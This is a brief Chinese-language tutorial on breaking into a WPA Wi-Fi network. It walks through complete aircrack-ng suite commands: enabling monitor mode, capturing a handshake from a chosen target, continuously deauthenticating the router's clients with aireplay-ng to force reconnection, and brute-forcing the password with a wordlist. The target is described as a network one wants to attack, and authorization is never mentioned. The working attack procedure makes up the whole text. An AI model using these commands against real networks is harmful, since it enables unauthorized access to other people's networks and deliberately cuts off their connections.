1、查看无线网卡
ifconfig
一般来说,笔记本电脑自带的无线网卡名为wlan0,如果你有usb无线网卡,那usb无线网卡名为wlan1,如果只有usb无线网卡,则名字为wlan0
2、开启监听模式
airmon-ng start wlan0
将wlan0的模式变为监听模式,网卡名自动变为wlan0mon(偶尔可能不变)
3、检测周围的无线网络
airodump-ng wlan0mon
如果显示No Such device则表明网卡名没有改变,就输入airodump-ng wlan0。出于隐私问题,我这里就不显示BSSID和ESSID了
记录下你想要攻击的网络的bssid,ch信道
4、airodump-ng -c 信道值 --bssid 所要攻击的bssid -w 保存握手包的路径及握手包名称 网卡名
我这里攻击的是11信道,bssid为 AA:BB:CC:DD:EE:FF 保存在桌面,握手包名为a,网卡是刚才的监听网卡
可以看到,目前wifi下并没有客户端存在,主要是我选的时间是个问题,就这样一直开在这等带别人连接wifi时会获取一个握手包保存
5、存在客户端时的握手包获取
新打开一个终端输入aireplay-ng -0 0 -a 之前的bssid -c 上图中STATION下的值 wlan0mon
该命令可以攻击所选择的路由器及其下客户端,断开其连接,等到其自动重连是获取握手包保存
6、密码暴力破解
aircrack-ng -w ~/桌面/408.txt ~/桌面/a.cap
408.txt是自己的字典 a.cap是捕获到的握手包
字典越强大,破解到密码的可能性越大,跑的速度越慢